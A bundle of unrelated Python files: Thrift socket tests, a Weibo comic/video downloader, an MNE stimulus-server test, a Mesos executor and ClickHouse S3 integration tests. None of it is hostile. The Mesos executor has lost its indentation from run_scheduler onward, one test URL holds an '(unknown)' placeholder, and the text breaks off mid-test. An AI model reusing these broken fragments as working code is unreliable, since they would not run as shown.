def test_deprecated_str_form_of_port(self):
    # Make sure that the deprecated form of the `port` parameter is
    # accepted in TServerSocket and TSocket.
    port = "0"  # str instead of int: deprecated but still supported
    text = b"hi"  # sample text to send over the wire
    # NB: unfortunately unittest.TestCase.assertWarns isn't available until
    # py3.
    with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
        addr = server.getSocketNames()[0]
        with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
            conn.write(text)
        with server.accept() as client:
            read = client.read(len(text))
        self.assertEquals(read, text)
def test_bad_port(self):
    """A non-numeric port string must raise ValueError for both the
    server-side and client-side socket constructors."""
    bad_port = 'bogus'
    # Same check for TServerSocket first, then TSocket (original order).
    for socket_factory in (TSocket.TServerSocket, TSocket.TSocket):
        with self.assertRaises(ValueError):
            with socket_factory(port=bad_port):
                pass
def test_unix_socket(self):
    """Round-trip a message over a unix-domain socket pair."""
    text = b"hi"  # sample text to send over the wire
    # Borrow a unique filesystem path from a temp file for the socket name.
    with tempfile.NamedTemporaryFile(delete=True) as fh:
        unix_socket = fh.name
        with TSocket.TServerSocket(unix_socket=unix_socket) as server:
            with TSocket.TSocket(unix_socket=unix_socket) as conn:
                conn.write(text)
            with server.accept() as client:
                read = client.read(len(text))
            self.assertEquals(read, text)
        # The socket will not be cleaned up when the server has been shutdown.
        self.assertTrue(os.path.exists(unix_socket))
|
Comic2pdfAdv.py | import requests
from colorama import *
import time
import os
import fitz
import threading
import glob
from pyquery import PyQuery as pq
class Comic2PDF():
    """Download the images of a Weibo headline article (comic) and merge
    them into a single PDF, or download a Weibo video by its direct URL.

    Images are cached under ``./download/``; the cache directory is removed
    once the PDF has been written.
    """

    def __init__(self):
        self.path = "./download/"  # temporary image cache directory
        self.file_name = ""        # article title; becomes the PDF filename
        self.label = "谨以此软件献给永远的神作----龙珠"  # startup banner

    def getmsTime(self):
        """Return the current time as a millisecond timestamp (int).

        The exact value does not matter -- it is sent as a cache-busting
        query parameter, the way a real browser would.
        """
        t = time.time()
        mst = int(round(t * 1000))
        return mst

    def generate_img_urls(self, id):
        """Fetch the Weibo headline article ``id`` and return its image URLs.

        Also records the article title in ``self.file_name`` and prints a
        short summary (title, publish time, read count).
        """
        tm = self.getmsTime()
        url = "https://card.weibo.com/article/m/aj/detail?id=%s&_t=%s" % (
            id, str(tm))
        # The Referer header is required or the endpoint rejects the call.
        refervalue = "https://card.weibo.com/article/m/show/id/%s" % id
        # FIX: the User-Agent previously contained a stray quote
        # ('Chrome/76.0".3809.100'), producing a malformed version string.
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
                   'Referer': refervalue}
        response = requests.get(url, headers=headers)
        text = response.json()
        self.file_name = text['data']['title']
        print("--------------------------------------")
        print("漫画: " + text['data']['title'])
        print("发布时间: " + text['data']['create_at'])
        print("阅读量: " + text['data']['read_count'])
        print("--------------------------------------")
        img_url_all = text['data']['content']
        pic_url = []
        # The article body is HTML; each <p><img> holds one comic page.
        doc = pq(img_url_all)
        lis = doc('p img').items()
        for li in lis:
            pic_url.append(li.attr('src'))
        return pic_url

    def create_down_dir(self):
        """Create the temporary download directory if needed; return its path."""
        path = self.path
        if not os.path.exists(path):
            os.mkdir(path)
        return path

    def download_imgs(self, img_urls):
        """Download every URL in ``img_urls`` into the cache directory.

        Files are named 001.xxx, 002.xxx, ... so a lexicographic sort
        preserves page order. Returns the cache directory path.
        """
        path = self.create_down_dir()
        count = 1
        for strimg in img_urls:
            response = requests.get(strimg)
            # strimg[-4:] keeps the original file extension (e.g. ".jpg").
            with open(path + str(count).zfill(3) + strimg[-4:], 'wb') as file:
                file.write(response.content)
            print(Fore.GREEN + "已下载 " + strimg)
            count += 1
        return path

    def generatePDF(self, imgpath):
        """Merge all images under ``imgpath`` into one PDF next to the script.

        The PDF is named after the article title, or a millisecond
        timestamp when no title is known (long-image mode).
        """
        doc = fitz.open()
        for img in sorted(glob.glob(imgpath + "*")):
            print(Fore.MAGENTA + "插入图片: " + img)
            imgdoc = fitz.open(img)
            pdfbytes = imgdoc.convertToPDF()
            imgpdf = fitz.open("pdf", pdfbytes)
            doc.insertPDF(imgpdf)
        file_name = self.file_name
        if file_name == "":
            doc.save(str(self.getmsTime()) + ".pdf")
        else:
            doc.save(file_name + ".pdf")
        # Reset so the next run does not reuse a stale title.
        self.file_name = ""

    def delete_imgs(self, imgpath):
        """Delete all cached images and remove the cache directory itself."""
        imgs = glob.glob(imgpath + "*")
        for img in imgs:
            os.remove(img)
            print(Fore.BLUE + "删除缓存 " + img)
        os.removedirs(imgpath)
        print("--------------------------------------")

    def paint_author(self):
        """Print the author/contact footer."""
        about = """\n作者: Elliot Lee \n反馈:lsldragon@ouotlook.com"""
        print(Fore.BLACK + Back.WHITE + about)
        print(Style.RESET_ALL)

    def get_from_id(self):
        """Workflow 1: article id -> download images -> PDF -> clean up."""
        print()
        value = input(Fore.YELLOW + "输入漫画id(微博网页头条文章): ")
        res = self.generate_img_urls(value)
        path = self.download_imgs(res)
        self.generatePDF(path)
        self.delete_imgs(path)
        print(Fore.RED + "生成pdf成功")
        self.paint_author()

    def get_from_longimg_url(self):
        """Workflow 2: convert a single long-image URL into a PDF."""
        print()
        value = input(Fore.YELLOW + "输入长图的url链接: ")
        # download_imgs() expects a list of URLs, so wrap the single string.
        path = self.download_imgs([value])
        self.generatePDF(path)
        self.delete_imgs(path)
        print(Fore.RED + "生成pdf成功")
        self.paint_author()

    def down_videos(self, url):
        """Download the video at ``url`` into a timestamp-named .mp4 file.

        Runs in a worker thread (see down_weibo_video).
        """
        print(Fore.GREEN + "正在下载.....")
        # FIX: same malformed User-Agent as in generate_img_urls.
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36'}
        response = requests.get(url, headers=headers)
        video_name = str(self.getmsTime()) + ".mp4"
        with open(video_name, 'wb') as f:
            f.write(response.content)

    def down_weibo_video(self):
        """Workflow 3: download a Weibo video given its real media URL."""
        print()
        help = """获取视频真实地址操作方法:\n
        1. 右键微博视频, 点击视频地址选项,此时会出现该视频的url. Ctrl + C 复制url
        2. 将此url复制到浏览器的搜索框中, 回车. 即是该视频的播放页面
        3. 以谷歌浏览器为例, 按F12, 此时出现浏览器抓包的界面,F5刷新页面
        4. 点击网络(Network), 点击下方的媒体(Meida)
        5. 此时浏览器已经抓到了视频资源,点击出现的选项
        6. 在右侧的头文件(headers)中找到请求url(request url)
        7. 复制request url 后的链接,即使该视频的真实地址
        8. 将真实地址复制到该软件即可
        """
        print(Fore.CYAN + help)
        value = input(Fore.YELLOW + "输入微博视频的视频地址: ")
        print("--------------------------------------")
        print(Fore.GREEN + "正在解析.....\n")
        p = threading.Thread(target=self.down_videos, args=(value,))
        p.start()
        p.join()  # wait for the download thread to finish
        print()
        time.sleep(1.5)
        print(Fore.RED + "下载视频完成")
        print(Fore.YELLOW + "--------------------------------------")
        self.paint_author()

    def run(self):
        """Interactive menu loop; dispatches to the three workflows."""
        print()
        print(Fore.WHITE + Back.RED + self.label)
        print(Style.RESET_ALL)
        print()
        options = """选择:
        1. id,微博头条文章的图片转为PDF
        2. 长图,微博的长图链接转换为PDF
        3. 下载微博视频beta
        -> """
        while True:
            try:
                value = input(options)
                if value == "1":
                    self.get_from_id()
                elif value == "2":
                    self.get_from_longimg_url()
                elif value == "3":
                    self.down_weibo_video()
                else:
                    pass
            except KeyboardInterrupt:
                # FIX: the original bare `except:` also swallowed Ctrl-C,
                # making the program impossible to quit cleanly.
                break
            except Exception:
                print(Fore.RED + "失败!可是我也不太清楚问题出在哪里,请重试")
                print(Style.RESET_ALL)
# Script entry point: build the downloader, run the interactive menu,
# and reset terminal colors on the way out.
if __name__ == "__main__":
    app = Comic2PDF()
    app.run()
    print(Style.RESET_ALL)
test_stim_client_server.py | import threading
import time
from nose.tools import assert_equal, assert_raises, assert_true
from mne.realtime import StimServer, StimClient
from mne.externals.six.moves import queue
from mne.utils import requires_good_network, run_tests_if_main
_server = None
_have_put_in_trigger = False
_max_wait = 10.
@requires_good_network
def test_connection():
    """Test TCP/IP connection for StimServer <-> StimClient.
    """
    global _server, _have_put_in_trigger
    # have to start a thread to simulate the effect of two
    # different computers since stim_server.start() is designed to
    # be a blocking method

    # use separate queues because timing matters
    trig_queue1 = queue.Queue()
    trig_queue2 = queue.Queue()

    # start a thread to emulate 1st client
    thread1 = threading.Thread(target=_connect_client, args=(trig_queue1,))
    thread1.daemon = True

    # start another thread to emulate 2nd client
    thread2 = threading.Thread(target=_connect_client, args=(trig_queue2,))
    thread2.daemon = True

    thread1.start()
    thread2.start()

    with StimServer('localhost', port=4218, n_clients=2) as stim_server:
        _server = stim_server  # expose the server to the client threads
        stim_server.start(timeout=10.0)  # don't allow test to hang

        # Add the trigger to the queue for both clients
        stim_server.add_trigger(20)
        _have_put_in_trigger = True  # monkey patch

        # the assert_equal must be in the test_connection() method
        # Hence communication between threads is necessary
        trig1 = trig_queue1.get(timeout=_max_wait)
        trig2 = trig_queue2.get(timeout=_max_wait)
        assert_equal(trig1, 20)

        # test if both clients receive the same trigger
        assert_equal(trig1, trig2)

    # test timeout for stim_server
    with StimServer('localhost', port=4218) as stim_server:
        assert_raises(StopIteration, stim_server.start, 0.1)
def _connect_client(trig_queue):
    """Helper method that instantiates the StimClient.

    Runs in a daemon thread; the received trigger is placed on
    ``trig_queue`` so the main test thread can assert on it.
    """
    # just wait till the main thread reaches stim_server.start()
    t0 = time.time()
    while (time.time() - t0 < _max_wait and
           (_server is None or not _server._running)):
        time.sleep(0.01)
    assert_true(_server is not None and _server._running)

    # instantiate StimClient
    stim_client = StimClient('localhost', port=4218)

    # wait for script to reach stim_server.add_trigger()
    t0 = time.time()
    while (time.time() - t0 < _max_wait and not _have_put_in_trigger):
        time.sleep(0.01)
    assert_true(_have_put_in_trigger)

    trig_queue.put(stim_client.get_trigger())
    stim_client.close()
run_tests_if_main()
|
executor.py | #!/usr/bin/env python
import os
import pickle
import subprocess
import sys
import threading
import time
from threading import Thread
import mesos
# This function is called in its own thread to actually run the user's command.
# When it finishes, it shuts down the scheduler driver (disconnecting the
# framework) and exits the program.
def run_command(command, driver):
    print "Running " + command
    equal_signs = "=" * 40  # visual separator around the command's output
    print equal_signs
    try:
        code = os.system(command)
        print equal_signs
        print "Command completed with code %d" % code
    except OSError,e:
        print equal_signs
        print "os.system call failed, see stderr for details"
        print >>sys.stderr, "Error executing command"
        print >>sys.stderr, e
        # Disconnect from Mesos and exit with a failure status.
        driver.stop()
        sys.exit(2)
    # Normal path: disconnect and exit 0 regardless of the command's own
    # exit code (which was already printed above).
    driver.stop()
    sys.exit(0)
# A secondary scheduler registered for our framework with Mesos so that
# our first scheduler (on the machine that ran mesos-submit) can disconnect.
# This scheduler launches no further tasks but allows our one task to continue
# running in the cluster -- the task essentially becomes its own scheduler.
class SecondaryScheduler(mesos.Scheduler):
    def __init__(self, framework_name, command):
        mesos.Scheduler.__init__(self)
        self.framework_name = framework_name  # name reported to the master
        self.command = command  # shell command to run once registered

    def getFrameworkName(self, driver):
        return self.framework_name

    def getExecutorInfo(self, driver):
        # Point Mesos at the "executor" binary in the current directory.
        executorPath = os.path.join(os.getcwd(), "executor")
        return mesos.ExecutorInfo(executorPath, "")

    def resourceOffer(self, driver, oid, offers):
        # Reject the offer with an infinite timeout, since we are here
        # only to serve as a second scheduler to keep the framework running
        driver.replyToOffer(oid, [], {"timeout": "-1"})

    def registered(self, driver, fid):
        print "Registered with Mesos; starting command"
        # run_command stops the driver and exits the process when done.
        Thread(target=run_command, args=[self.command, driver]).start()

    def error(self, driver, code, message):
        print "Error from Mesos: %s (code %s)" % (message, code)
# This function is called in a separate thread to run our secondary scheduler;
# for some reason, things fail if we launch it from the executor's launchTask
# callback (this is likely to be SWIG/Python related).
def run_scheduler(fid, framework_name, master, command):
print "Starting secondary scheduler"
sched = SecondaryScheduler(framework_name, command)
sched_driver = mesos.MesosSchedulerDriver(sched, master, fid)
sched_driver.run()
# Executor class for mesos-submit. Expects to be given a single task
# to launch with a framework ID, master URL and command as parameters.
# Once this task is received, the executor registers as a scheduler for the
# framework by creating a SecondaryScheduler object, allowing the mesos-submit
# command on the user's machine to exit, and it starts the user's command
# on this cluster node as a subprocess.
class MyExecutor(mesos.Executor):
def __init__(self):
mesos.Executor.__init__(self)
self.sched = None
def launchTask(self, driver, task):
if self.sched == None:
print "Received task; going to register as scheduler"
# Recover framework ID, master and command from task arg
fid, framework_name, master, command = pickle.loads(task.arg)
print "Mesos-submit parameters:"
print " framework ID = %s" % fid
print " framework name = %s" % framework_name
print " master = %s" % master
print " command = %s" % command
# Start our secondary scheduler in a different thread (for some reason,
# this fails if we do it from the same thread.. probably due to some
# SWIG Python interaction).
Thread(target=run_scheduler,
args=[fid, framework_name, master, command]).start()
else:
print "Error: received a second task -- this should never happen!"
def killTask(self, driver, tid):
sys.exit(1)
def error(self, driver, code, message):
print "Error from Mesos: %s (code %s)" % (message, code)
if __name__ == "__main__":
    print "Starting mesos-submit executor"
    executor = MyExecutor()
    # run() blocks until the executor driver is stopped or aborted.
    mesos.MesosExecutorDriver(executor).run()
|
test.py | import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance, get_instances_dir
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './{}/dummy/configs/config.d/defaultS3.xml'.format(get_instances_dir()))
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
    # Allows read-write access for bucket without authorization.
    # The policy grants anonymous GetBucketLocation/ListBucket on the bucket
    # and GetObject/PutObject on every key beneath it.
    bucket_read_write_policy = {"Version": "2012-10-17",
                                "Statement": [
                                    {
                                        "Sid": "",
                                        "Effect": "Allow",
                                        "Principal": {"AWS": "*"},
                                        "Action": "s3:GetBucketLocation",
                                        "Resource": "arn:aws:s3:::root"
                                    },
                                    {
                                        "Sid": "",
                                        "Effect": "Allow",
                                        "Principal": {"AWS": "*"},
                                        "Action": "s3:ListBucket",
                                        "Resource": "arn:aws:s3:::root"
                                    },
                                    {
                                        "Sid": "",
                                        "Effect": "Allow",
                                        "Principal": {"AWS": "*"},
                                        "Action": "s3:GetObject",
                                        "Resource": "arn:aws:s3:::root/*"
                                    },
                                    {
                                        "Sid": "",
                                        "Effect": "Allow",
                                        "Principal": {"AWS": "*"},
                                        "Action": "s3:PutObject",
                                        "Resource": "arn:aws:s3:::root/*"
                                    }
                                ]}

    minio_client = started_cluster.minio_client
    minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))

    # Second bucket that keeps authentication enabled; recreated from
    # scratch so each test session starts clean.
    started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
    if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
        minio_client.remove_bucket(started_cluster.minio_restricted_bucket)

    minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
    """Upload the raw ``data`` bytes to ``bucket``/``filename`` via minio."""
    payload = io.BytesIO(data)
    started_cluster.minio_client.put_object(bucket, filename, payload, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
    # type: (ClickHouseCluster, str, str, bool) -> str
    """Download ``bucket``/``filename`` from minio and return its content.

    Returns a UTF-8 decoded ``str`` by default, raw ``bytes`` when
    ``decode`` is False.
    """
    data = started_cluster.minio_client.get_object(bucket, filename)
    # Join the streamed chunks in one pass instead of the quadratic
    # ``bytes +=`` accumulation loop.
    data_str = b"".join(data.stream())
    if decode:
        return data_str.decode()
    return data_str
@pytest.fixture(scope="module")
def started_cluster():
    """Module-scoped ClickHouse cluster with minio and the S3 mock servers."""
    try:
        cluster = ClickHouseCluster(__file__)
        # Instance with a remote-host filter that rejects unknown hosts.
        cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
                             with_minio=True)
        # Default instance used by most tests.
        cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
        # Instance with a redirect limit for the zero-redirect test.
        cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
                             user_configs=["configs/s3_max_redirects.xml"])
        logging.info("Starting cluster...")
        cluster.start()
        logging.info("Cluster started")

        prepare_s3_bucket(cluster)
        logging.info("S3 bucket created")
        run_s3_mocks(cluster)

        yield cluster
    finally:
        # Always tear the containers down, even if setup failed part-way.
        cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
    # type: (ClickHouseInstance, str, object, dict) -> str
    """Execute ``query`` on ``instance`` with start/finish logging and
    return the query's output."""
    logging.info("Running query '{}'...".format(query))
    output = instance.query(query, stdin=stdin, settings=settings)
    logging.info("Query finished")
    return output
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
    pytest.param("", True, 'auto', id="positive"),
    pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
    pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
    pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
    pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
    pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
    pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
    pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
    # type: (ClickHouseCluster) -> None
    # Authenticated cases target the restricted bucket; anonymous ones the
    # open bucket.
    bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
    values_csv = "1,2,3\n3,2,1\n78,43,45\n"
    filename = "test.csv"
    # NOTE(review): "(unknown)" in the URL looks like a lost placeholder
    # (probably {filename}) from the original source -- confirm upstream.
    put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/(unknown)',
                    {maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""

    try:
        run_query(instance, put_query)
    except helpers.client.QueryRuntimeException:
        # Only the wrong-credentials cases are allowed to fail.
        if positive:
            raise
    else:
        assert positive
        # The stored object must contain exactly the inserted rows.
        assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
    "space",
    "plus"
])
def test_get_file_with_special(started_cluster, special):
    """Read files whose names contain a space or '+', both by exact
    (percent-encoded) name and via glob patterns."""
    symbol = {"space": " ", "plus": "+"}[special]
    urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
    auth = "'minio','minio123',"
    bucket = started_cluster.minio_restricted_bucket
    instance = started_cluster.instances["dummy"]
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
    values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
    # Upload under the raw special character; read back percent-encoded.
    filename = f"get_file_with_{special}_{symbol}two.csv"
    put_s3_file_content(started_cluster, bucket, filename, values_csv)

    # Exact name with the symbol percent-encoded.
    get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
    assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values

    # Glob over the common prefix only.
    get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
    assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values

    # Glob placed after the percent-encoded symbol.
    get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
    assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
    "space",
    "plus",
    "plus2"
])
def test_get_path_with_special(started_cluster, special):
    """Check how percent-encoded specials in a URL path reach the server.

    The service on resolver:8082 appears to echo back the path it received
    (see run_s3_mocks: echo.py), so the assertion pins the exact
    encoding/decoding ClickHouse performs on the way.
    """
    # What the server is expected to report vs. what we place in the query.
    symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
    safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
    auth = "'minio','minio123',"
    table_format = "column1 String"
    instance = started_cluster.instances["dummy"]
    get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
    assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
    pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
    # type: (ClickHouseCluster, str) -> None
    """Inserting from an empty table must create no S3 object at all, so a
    subsequent read must fail with "key does not exist"."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"

    create_empty_table_query = """
        CREATE TABLE empty_table (
        {}
        ) ENGINE = Null()
        """.format(table_format)
    run_query(instance, create_empty_table_query)

    filename = "empty_put_test.csv"
    put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
        started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
    run_query(instance, put_query)

    try:
        run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
            started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
        assert False, "Query should be failed."
    except helpers.client.QueryRuntimeException as e:
        # BUG FIX: the original asserted `.find(...) != 0`, which is true
        # for almost any message; require the substring to be PRESENT
        # (`!= -1`), matching the checks in the redirect tests.
        assert str(e).find("The specified key does not exist") != -1
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
    pytest.param("", True, id="positive"),
    pytest.param("'minio','minio123',", True, id="auth_positive"),
    pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
    # type: (ClickHouseCluster, bool, str) -> None
    bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    filename = "test.csv"
    # The data is supplied via stdin ("format CSV"), not inline VALUES.
    put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
        started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
    csv_data = "8,9,16\n11,18,13\n22,14,2\n"

    try:
        run_query(instance, put_query, stdin=csv_data)
    except helpers.client.QueryRuntimeException:
        # Only the wrong-credentials case is allowed to fail.
        if positive:
            raise
    else:
        assert positive
        # The stored object must match the uploaded CSV byte-for-byte.
        assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
    # type: (ClickHouseCluster) -> None
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
    values_csv = "1,1,1\n1,1,1\n11,11,11\n"
    filename = "test.csv"
    # Write through the redirecting endpoint; the client must follow it.
    query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
    run_query(instance, query)

    assert values_csv == get_s3_file_content(started_cluster, bucket, filename)

    # Read back through the redirect as well, with a computed extra column.
    query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
    stdout = run_query(instance, query)

    assert list(map(str.split, stdout.splitlines())) == [
        ["1", "1", "1", "1"],
        ["1", "1", "1", "1"],
        ["11", "11", "11", "1331"],
    ]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
    # type: (ClickHouseCluster) -> None
    bucket = started_cluster.minio_bucket
    # This instance has a restrictive s3_max_redirects user setting
    # (see configs/s3_max_redirects.xml in the fixture).
    instance = started_cluster.instances["s3_max_redirects"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
    filename = "test.csv"

    # Should work without redirect
    query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
        started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
    run_query(instance, query)

    # Should not work with redirect
    query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
    exception_raised = False
    try:
        run_query(instance, query)
    except Exception as e:
        assert str(e).find("Too many redirects while trying to access") != -1
        exception_raised = True
    finally:
        # The second insert must have failed with the redirect error.
        assert exception_raised
def test_put_get_with_globs(started_cluster):
    # type: (ClickHouseCluster) -> None
    """Write a 10x10 grid of single-row files, then read them all back
    through a combined {a,b,c,d} / '?' glob pattern."""
    bucket = started_cluster.minio_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
    max_path = ""
    for i in range(10):
        for j in range(10):
            path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
            max_path = max(path, max_path)  # lexicographically greatest path, checked via max(_path)
            values = "({},{},{})".format(i, j, i + j)
            query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
                started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
            run_query(instance, query)

    # %3f is the escaped '?' single-character wildcard.
    query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
    assert run_query(instance, query).splitlines() == [
        "450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
    pytest.param("", True, id="positive"),
    pytest.param("'wrongid','wrongkey'", False, id="negative"),
    # ("'minio','minio123',",True), Redirect with credentials not working with nginx.
])
def test_multipart_put(started_cluster, maybe_auth, positive):
    # type: (ClickHouseCluster) -> None
    bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
    instance = started_cluster.instances["dummy"]  # type: ClickHouseInstance
    table_format = "column1 UInt32, column2 UInt32, column3 UInt32"

    # Minimum size of part is 5 Mb for Minio.
    # See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
    min_part_size_bytes = 5 * 1024 * 1024
    csv_size_bytes = int(min_part_size_bytes * 1.5)  # To have 2 parts.

    one_line_length = 6  # 3 digits, 2 commas, 1 line separator.

    # Generate data having size more than one part
    int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
    csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])

    assert len(csv_data) > min_part_size_bytes

    filename = "test_multipart.csv"
    put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
        started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)

    try:
        # Cap the part size and disable single-part upload so a multipart
        # upload is forced.
        run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
                                                                 's3_max_single_part_upload_size': 0})
    except helpers.client.QueryRuntimeException:
        # Only the wrong-credentials case is allowed to fail.
        if positive:
            raise
    else:
        assert positive

        # Use proxy access logs to count number of parts uploaded to Minio.
        proxy_logs = started_cluster.get_container_logs("proxy1")  # type: str
        assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2

        assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
def test_remote_host_filter(started_cluster):
    """Queries to hosts not whitelisted in config.xml must be rejected,
    for both SELECT and INSERT."""
    instance = started_cluster.instances["restricted_dummy"]
    format = "column1 UInt32, column2 UInt32, column3 UInt32"

    # SELECT from a non-whitelisted host.
    query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
        "invalid_host", MINIO_INTERNAL_PORT, started_cluster.minio_bucket, format)
    assert "not allowed in config.xml" in instance.query_and_get_error(query)

    # INSERT to a non-whitelisted host.
